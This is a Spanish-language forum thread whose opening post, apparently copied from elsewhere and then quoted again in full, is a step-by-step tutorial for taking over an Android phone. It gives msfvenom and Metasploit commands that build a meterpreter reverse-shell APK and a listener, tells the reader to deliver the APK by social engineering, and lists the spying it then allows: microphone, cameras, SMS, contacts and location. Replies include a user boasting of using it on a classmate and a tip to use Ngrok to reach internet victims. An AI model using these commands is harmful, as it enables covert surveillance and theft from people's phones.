¡Como tomar el control de un Android en menos de 1 minuto!

CORNE15

Miembro muy activo
Noder
21 Feb 2019
148
63
Como es de público conocimiento el sistema operativo Android cubre aproximadamente el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la seguridad de los dispositivos y de la información que un usuario expone en sus dispositivos.
Antes que nada, muy buenos días, hoy vamos a tratar un tema muy recurrente de la cual mucha gente cree esta exenta, el ataque a dispositivos Android, voy a tratar de demostrar como con un par de simples líneas de comandos y un poco de ingeniería socia como podemos acceder a un dispositivo Android, recuerden siempre trabajar en un entorno de LABORATORIO

NECESITAMOS:

1 Máquina Virtual con KALI 2.0 o Backtrack (vamos a usar Metasploit)
1 Máquina Virtual con Android

EMPECEMOS:

La creación de la máquina virtual con KALI esta explicada en el POST anterior asique eso queda descartado, ahora nos vamos a enfocar en la creación de la máquina virtual con ANDROID que particularmente para mí fue bastante difícil encontrar algo que se parezca lo bastante posible a un dispositivo Android, que además sea fácil y que sea rápido ya que por lo general la virtualización de este tipo de dispositivos consume bastaste recursos.

En este caso voy a utilizar Genymotion es un emulador de Android que aprovecha la arquitectura x86 para ejecutar de forma fluida y rápida distintos dispositivos Android. Olvidando la lentitud del emulador nativo de Android podemos ejecutar todo tipo de aplicaciones y juegos en nuestro Windows, Mac o Linux. Uno de los principales usos de Genymotion es facilitar el desarrollo de aplicaciones Android. Casi más de 900.000 usuarios registrados usan sus máquinas virtuales para crear aplicaciones usando Eclipse o intelliJ. Se integran perfectamente con el adb, línea de comandos y los diferentes entornos de desarrollo. Podemos lanzar en apenas un par de segundos las aplicaciones conectadas al ADT desde el IDE para testearla. Mucho tiempo ahorrado. Genymotion está basado en el uso de máquinas virtuales x86 optimizadas para correr sobre Virtual box. A muchos les sonarán proyectos similares, pero la gente de Genymotion ha conseguido crear una interfaz simple capaz de soportar distintas funcionalidades accesibles a cualquier usuario, sin olvidar a los desarrolladores (su principal target y modelo de negocio).

Acá les dejo el link de donde descargarlo: https://www.genymotion.com/#!/download (aclaración, primero deben crearse un usuario, ya que es requerido para descargar el dispositivo luego).

Una vez descargado Genymotion pueden descargar por versión de Android (actualmente tiene desde la versión 2.3.7 hasta la 5.1.0) o por Dispositivo en donde podrán elegir marcas entre SONY, SAMSUNG, HTC, MOTOROLA, GOOGLE entre otras, cada una de la versiones con distintos requisitos.

767


Una vez que terminamos de descargar la versión de dispositivo que necesitamos nos queda más o menos así: (en mi caso descargue el modelo Nexus 5 con Android 4.4.4)

768


Solo les queda hacer click en “Start” para prender la máquina virtual y que se nos vea de la siguiente forma:

769


Listo! Ya tengo mi Nexus 5 andando y listo para hacer las pruebas que necesite!

Ahora si vamos al KALI a preparar la aplicación maliciosa (Application Package File o “.APK” )

Creamos el archivo malicioso, para eso usamos MSFVENOM desde una terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=Puerto_KALI R > /root/AplicacionMaliciosa.apk

090715_0451_comotomarco5.png

Listo, ya tengo mi APK maliciosa:

090715_0451_comotomarco6.png

Lo próximo es dejar “escuchando” desde KALI hasta que la víctima ejecute la aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente manera:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_KALI
set LPORT Puerto_KALI
exploit


090715_0451_comotomarco7.png

Ahora debemos enviar el APK malicioso a nuestra victima usan un poco de Ingeniería Social
y nos queda esperar a que la víctima lo ejecute luego de eso obtendremos lo siguiente:



Android Hackeado!!

090715_0451_comotomarco9.png

Listo!!! Una sesión de Meterpreter conectada hacia nuestra víctima, en este caso se puede ver que el comando “sysinfo” me dice que la víctima tiene un Android 4.4.4

Con el comando HELP podemos ver qué acciones podemos hacer en el dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores, pero las acciones particulares de Android son:

Grabar con el Micrófono
Tomar Fotos con ambas cámaras (Frontal y Trasera)
Hacer Streming desde la cámara seleccionada
Verificar si el dispositivo es ROOTEADO
Obtener el listado de llamadas
Obtener el listado de Contactos
Obtener los SMS
Obtener la Ubicación del Dispositivo
Enviar SMS
Entre otras más cosas…

090715_0451_comotomarco10.png

¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.

090715_0451_comotomarco11.png


QUIERO DEJAR CLARO QUE NO ME HAGO CARGO DEL MAL USO QUE LE DEIS
ESTO LO HE ENCONTRADO EN UNA WEB Y ME HA PARECIDO MUY INTERESANTE, POR ESO OS LO HE QUERIDO COMPARTIR :D
 

PiNsChEr

Puedo ser tu mod o el que te modera la cara
Miembro del equipo
Moderador
Noderador
Nodero
Noder
26 Dic 2018
1.226
510
Perverso pero util xD, buen tutorial
 
  • Like
Reacciones : Coscu y CORNE15

r3dalk

Miembro muy activo
Noder
25 Dic 2018
223
175
Gran aporte, esperemos que sirva para concienciar sobre la inseguridad de descargarse cualquier APK que pillemos por internet. Supongo que el código se puede incluir en cualquier APK firmado oficial, no?
 

CORNE15

Miembro muy activo
Noder
21 Feb 2019
148
63
Gran aporte, esperemos que sirva para concienciar sobre la inseguridad de descargarse cualquier APK que pillemos por internet. Supongo que el código se puede incluir en cualquier APK firmado oficial, no?
Si, creo que si
 

E-Glitch0

Miembro muy activo
Noder
18 Ene 2019
138
19
Como es de público conocimiento el sistema operativo Android cubre aproximadamente el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la seguridad de los dispositivos y de la información que un usuario expone en sus dispositivos.
Antes que nada, muy buenos días, hoy vamos a tratar un tema muy recurrente de la cual mucha gente cree esta exenta, el ataque a dispositivos Android, voy a tratar de demostrar como con un par de simples líneas de comandos y un poco de ingeniería socia como podemos acceder a un dispositivo Android, recuerden siempre trabajar en un entorno de LABORATORIO

NECESITAMOS:

1 Máquina Virtual con KALI 2.0 o Backtrack (vamos a usar Metasploit)
1 Máquina Virtual con Android

EMPECEMOS:

La creación de la máquina virtual con KALI esta explicada en el POST anterior asique eso queda descartado, ahora nos vamos a enfocar en la creación de la máquina virtual con ANDROID que particularmente para mí fue bastante difícil encontrar algo que se parezca lo bastante posible a un dispositivo Android, que además sea fácil y que sea rápido ya que por lo general la virtualización de este tipo de dispositivos consume bastaste recursos.

En este caso voy a utilizar Genymotion es un emulador de Android que aprovecha la arquitectura x86 para ejecutar de forma fluida y rápida distintos dispositivos Android. Olvidando la lentitud del emulador nativo de Android podemos ejecutar todo tipo de aplicaciones y juegos en nuestro Windows, Mac o Linux. Uno de los principales usos de Genymotion es facilitar el desarrollo de aplicaciones Android. Casi más de 900.000 usuarios registrados usan sus máquinas virtuales para crear aplicaciones usando Eclipse o intelliJ. Se integran perfectamente con el adb, línea de comandos y los diferentes entornos de desarrollo. Podemos lanzar en apenas un par de segundos las aplicaciones conectadas al ADT desde el IDE para testearla. Mucho tiempo ahorrado. Genymotion está basado en el uso de máquinas virtuales x86 optimizadas para correr sobre Virtual box. A muchos les sonarán proyectos similares, pero la gente de Genymotion ha conseguido crear una interfaz simple capaz de soportar distintas funcionalidades accesibles a cualquier usuario, sin olvidar a los desarrolladores (su principal target y modelo de negocio).

Acá les dejo el link de donde descargarlo: https://www.genymotion.com/#!/download (aclaración, primero deben crearse un usuario, ya que es requerido para descargar el dispositivo luego).

Una vez descargado Genymotion pueden descargar por versión de Android (actualmente tiene desde la versión 2.3.7 hasta la 5.1.0) o por Dispositivo en donde podrán elegir marcas entre SONY, SAMSUNG, HTC, MOTOROLA, GOOGLE entre otras, cada una de la versiones con distintos requisitos.

Ver el archivo adjunto 767

Una vez que terminamos de descargar la versión de dispositivo que necesitamos nos queda más o menos así: (en mi caso descargue el modelo Nexus 5 con Android 4.4.4)

Ver el archivo adjunto 768

Solo les queda hacer click en “Start” para prender la máquina virtual y que se nos vea de la siguiente forma:

Ver el archivo adjunto 769

Listo! Ya tengo mi Nexus 5 andando y listo para hacer las pruebas que necesite!

Ahora si vamos al KALI a preparar la aplicación maliciosa (Application Package File o “.APK” )

Creamos el archivo malicioso, para eso usamos MSFVENOM desde una terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=Puerto_KALI R > /root/AplicacionMaliciosa.apk

090715_0451_comotomarco5.png

Listo, ya tengo mi APK maliciosa:

090715_0451_comotomarco6.png

Lo próximo es dejar “escuchando” desde KALI hasta que la víctima ejecute la aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente manera:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_KALI
set LPORT Puerto_KALI
exploit


090715_0451_comotomarco7.png

Ahora debemos enviar el APK malicioso a nuestra victima usan un poco de Ingeniería Social
y nos queda esperar a que la víctima lo ejecute luego de eso obtendremos lo siguiente:



Android Hackeado!!

090715_0451_comotomarco9.png

Listo!!! Una sesión de Meterpreter conectada hacia nuestra víctima, en este caso se puede ver que el comando “sysinfo” me dice que la víctima tiene un Android 4.4.4

Con el comando HELP podemos ver qué acciones podemos hacer en el dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores, pero las acciones particulares de Android son:

Grabar con el Micrófono
Tomar Fotos con ambas cámaras (Frontal y Trasera)
Hacer Streming desde la cámara seleccionada
Verificar si el dispositivo es ROOTEADO
Obtener el listado de llamadas
Obtener el listado de Contactos
Obtener los SMS
Obtener la Ubicación del Dispositivo
Enviar SMS
Entre otras más cosas…

090715_0451_comotomarco10.png

¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.

090715_0451_comotomarco11.png


QUIERO DEJAR CLARO QUE NO ME HAGO CARGO DEL MAL USO QUE LE DEIS
ESTO LO HE ENCONTRADO EN UNA WEB Y ME HA PARECIDO MUY INTERESANTE, POR ESO OS LO HE QUERIDO COMPARTIR :D

PUTAMENTE PERFECTO BRO =) LIKE
 
  • Like
Reacciones : CORNE15

xOjeda22

Miembro muy activo
Noder Élite
Noder
24 Feb 2019
127
37
Buen copia y pega bro! JAJAJAJAJAJAJAJAJAJA. Es de hace dos años el tutorial y de un admin de un buen foro.. Por lo menos cambia un poco algo y que no se note tanto..

811



Algo tan simple como buscar el primer parrafo en Google con "intext:" ya se encuentra.

812
 

HxckzLxb2

Activo muy usuario
Noderador
Nodero
Noder
22 Feb 2019
962
676
Gran aporte, esperemos que sirva para concienciar sobre la inseguridad de descargarse cualquier APK que pillemos por internet. Supongo que el código se puede incluir en cualquier APK firmado oficial, no?
Sí, se puede. Se lo hice a uno de mi clase porque no dejaba de tocarme los cojones.
 

Risketo

Nuevo miembro
13 Nov 2019
2
0
Buen copia y pega bro! JAJAJAJAJAJAJAJAJAJA. Es de hace dos años el tutorial y de un admin de un buen foro.. Por lo menos cambia un poco algo y que no se note tanto..

Ver el archivo adjunto 811


Algo tan simple como buscar el primer parrafo en Google con "intext:" ya se encuentra.

Ver el archivo adjunto 812
Buen copia y pega bro! JAJAJAJAJAJAJAJAJAJA. Es de hace dos años el tutorial y de un admin de un buen foro.. Por lo menos cambia un poco algo y que no se note tanto..

Ver el archivo adjunto 811


Algo tan simple como buscar el primer parrafo en Google con "intext:" ya se encuentra.

Ver el archivo adjunto 812
Literalmente al final de su post pone: "ESTO LO HE ENCONTRADO EN UNA WEB Y ME HA PARECIDO MUY INTERESANTE, POR ESO OS LO HE QUERIDO COMPARTIR :D"
No se a que viene tu respuesta
 

Thegjv

Moder fav <3
Miembro del equipo
Moderador
Noderador
Nodero
Noder
30 Dic 2018
1.844
549
Buen copia y pega bro! JAJAJAJAJAJAJAJAJAJA. Es de hace dos años el tutorial y de un admin de un buen foro.. Por lo menos cambia un poco algo y que no se note tanto..

Ver el archivo adjunto 811


Algo tan simple como buscar el primer parrafo en Google con "intext:" ya se encuentra.

Ver el archivo adjunto 812
También te digo que no ha hecho nada malo trayendo el contenido a la comunidad y aún menos cuando ha puesto que no es suyo. Deberíais relajar un poco el CSI
 
  • Like
Reacciones : Dmaxel32 y CORNE15

Atlas

Miembro activo
17 Nov 2019
31
24
Desde que he leído Backtrack este tutorial ya ha perdido validez. Está algo obsoleto, Android ha aplicado mejoras de seguridad estos años y este método ya no es viable en teléfonos "recientes".
Un saludo
 
  • Like
Reacciones : destapeman y Thegjv

xOjeda22

Miembro muy activo
Noder Élite
Noder
24 Feb 2019
127
37
CIERTO! Perdón, ponía que no era suyo. Lo siento @CORNE15 pero es que odio el copypaste de la gente sin permiso o sin decir que es de otro autor sabes.. Gracias por tu aporte.
 

destapeman

FUCK PUSSYS, YES BADASS
Miembro del equipo
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Moderador
Noderador
Nodero
Noder
11 Ene 2019
3.086
4.336
Está bien para probar, pero si vas a traer algún tutorial de este tipo, intenta que sea con la último versión del momento en el que lo subes,

Aún así lo dicho, para novatos que quieran experimentar y meterse en este mundillo está bien.

Pero te aconsejaría que la menos dijeses (OBSOLETO o VERSIÓN ANTIGUA o algo por el estilo)
 
  • Like
Reacciones : CORNE15 y Atlas

Cristobacp

Nuevo miembro
12 Nov 2019
3
2
Buen aporte pero este ataque solo funcionaría en la red local, para que sea efectivo lo tendrías que hacer con Ngrok y ya podriamos explotar a cualquier usuario de Internet que descargue nuestra apk
 
  • Like
Reacciones : CORNE15
Arriba Pie